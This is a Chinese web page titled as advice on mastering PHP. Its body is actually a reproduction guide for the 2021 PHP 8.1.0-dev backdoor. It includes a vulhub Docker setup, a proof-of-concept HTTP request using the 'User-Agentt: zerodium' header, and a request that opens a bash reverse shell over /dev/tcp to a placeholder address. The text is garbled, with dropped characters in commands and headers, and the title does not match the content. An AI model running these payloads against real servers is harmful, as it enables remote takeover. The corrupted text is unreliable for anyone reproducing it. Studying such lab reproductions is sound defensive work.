当前位置:首页 > 每日看点

怎样深入学习php,成为php高手?

卡卷网1年前 (2025-01-01)每日看点249

简介

PHPverion8.1.0-dev于2021年3月28与后门一起发布,但是后门很快被发现并删除。

#漏洞概述

PHPverion8.1.0-dev的PHP在上运行,则攻击者可以通过发送User-Agentt标头执行任意代码。

#影响版本

PHP8.1.0-dev

#环境搭建

新建docker-compose.yml

version:'2' servs: we: image:vulhu/php:8.1-ackdoor volumes: -./index.php:/var/www/html/index.php ports: -"8080:80"

启动环境

docker-composeup-d

#漏洞复现

#poc验证

在header头增加user-agentt字段,值为:zerodiumvar_dump(2*3);

GET//1.1 Host:192.168.81.223:8800 Upgrade-Insece-Requests:1 User-Agent:Mozilla/5.0(WindowsNT10.0;Win64;x64)AppleWeKit/537.36(KHTML,likeGecko)Chrome/91.0.4472.77Safari/537.36 Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/if,image/wep,image/apng,*/*;q=0.8,application/signed-exchange;v=3;q=0.9 Accept-Encoding:gzip,deflate Accept-Language:zh-CN,zh;q=0.9,en;q=0.8,zh-TW;q=0.7,en-US;q=0.6 user-agentt:zerodiumvar_dump(2*3); Connection:close

如果执行了这个表达式,说明存在漏洞

#执行命令反弹shell

GET//1.1 Host:192.168.81.223:8800 Praa:no-cache Cache-Control:no-cache Upgrade-Insece-Requests:1 User-Agent:Mozilla/5.0(WindowsNT10.0;Win64;x64)AppleWeKit/537.36(KHTML,likeGecko)Chrome/91.0.4472.77Safari/537.36 Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/if,image/wep,image/apng,*/*;q=0.8,application/signed-exchange;v=3;q=0.9 Accept-Encoding:gzip,deflate User-Agentt:zerodium("ash-c'execash-i>&/dev/tcp/ip/66660>&1'"); Accept-Language:zh-CN,zh;q=0.9,en;q=0.8,zh-TW;q=0.7,en-US;q=0.6 Connection:close

#事件分析与反思

代码中含有”zerodium”字符串,而zerodium是一个专门漏洞的.在此事件中,怀疑黑客攻陷了://git.php.net,以PHP作者的名义做了两次代码提交。

#参考文章

s://log.dn.net/zy15667076526/article/details/116447864

扫描二维码推送至手机访问。

版权声明:本文由卡卷网发布,如需转载请注明出处。

本文链接:https://www.kajuan.net/ttnews/2025/01/6068.html

分享给朋友:

相关文章

短剧推广怎么做,24年还能赚钱吗?

短剧推广怎么做,24年还能赚钱吗?

首先声明:短剧授权是免费的! 短剧授权是免费的! 短剧授权是免费的! 其次我们再聊聊,短剧推广到底赚不赚钱? 多的就不说了, 随便上个图片,给大家过过瘾! 然后,我们进入主题: 0粉丝账号,新手,应该如何申请短剧推广! 一、短剧推广变现…

小米14和华为mate60怎么选?

手持荣耀20,用了五年多了,使用仍然较为流畅,但是电池不太行了,于是2024年8月在家乡的小米之家购买了小米14(12+256),用了快两个月吧,说说使用体验。 外观层面,由于我使用的荣耀20放在现在妥妥地属于小屏,习惯了小屏,遂购买小米1…

抖音和快手最大的区别是什么?

1、目标人群定位不同抖音:一二线城市,占比52%,大专学历以上,女性偏多。抖音以年轻群体居多。 快手:三四线城市,占比64%,高中学历以下,男女更均衡。快手所覆盖的年龄段范围更广。 2、内容创作的形式和深度不同抖音:偏深层,内容的装饰及表达…

在 Istio、Linkerd 和 Cilium 之间,哪种服务网格在性能上表现最佳?

在 Istio、Linkerd 和 Cilium 之间,哪种服务网格在性能上表现最佳?

在讨论服务网格之前,先理解一下为什么我们需要它。现代微服务架构意味着将应用拆分为多个小型、独立的服务,这些服务可以独立开发、部署和扩展。然而,服务之间的通信和管理成了巨大的挑战,例如如何保证安全的通信、负载均衡、监控与可观测性等。服务网格…

报名的网课分期付款怎么退?

你在你分期付款的订单下面有客服电话,直接打电话描述一下你的问题,你可以告诉他你是被恶意绑定的,在不了解有退学条件这一说的情况下报的课程,可能遇到消费者诈骗了,不承认有退学金,说是霸王条款,诈骗消费者,你若分期了先把自动续费关了,别让自己个人…

如何进行 Elasticsearch 调优实践?

如何进行 Elasticsearch 调优实践?

面试官心理分析这个问题是肯定要问的,说白了,就是看你有没有实际干过 es,因为啥?其实 es 性能并没有你想象中那么好的。很多时候数据量大了,特别是有几亿条数据的时候,可能你会懵逼的发现,跑个搜索怎么一下 5~10s ,坑爹了。第一次搜索的…

发表评论

访客

看不清,换一张

◎欢迎参与讨论,请在这里发表您的看法和观点。

Copyright © 2019-2024 www.kajuan.net 版权所有

Powered By Z-BlogPHP. Theme by TOYEAN.